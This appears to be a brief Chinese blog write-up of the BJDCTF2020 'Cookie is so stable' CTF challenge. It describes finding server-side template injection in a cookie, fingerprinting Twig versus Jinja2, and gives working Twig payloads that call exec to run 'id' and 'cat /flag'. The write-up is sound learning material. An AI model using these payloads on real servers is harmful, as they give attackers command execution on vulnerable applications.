• [BJDCTF2020]Cookie is so stable


    打开题目环境,一开始考虑是sql注入,但是发现输入什么都会回显输入的数据。

    这时候考虑是不是模板注入了。根据hint,注入点存在于cookie中。

    {{7*'7'}} 回显7777777 ==> Jinja2
    {{7*'7'}} 回显49 ==> Twig 

    将cookie中的UM_distinctid去掉,添加payload

    根据回显结果判断是twig模板引擎,打上payload

    {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
    {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

    拿到flag

    第一次做到ssti注入的题目,对于paylaod的理解还是很模糊。

  • 相关阅读:
    内存检测与优化
    iOS逆向工程(1)
    UIBezierPath 概述
    万能弹窗,点击区域外消失
    逆向传值
    蓝牙开发
    pod
    github
    iOS语音
    图像去噪——分割后处理
  • 原文地址:https://www.cnblogs.com/akger/p/15498349.html
Copyright © 2020-2023  润新知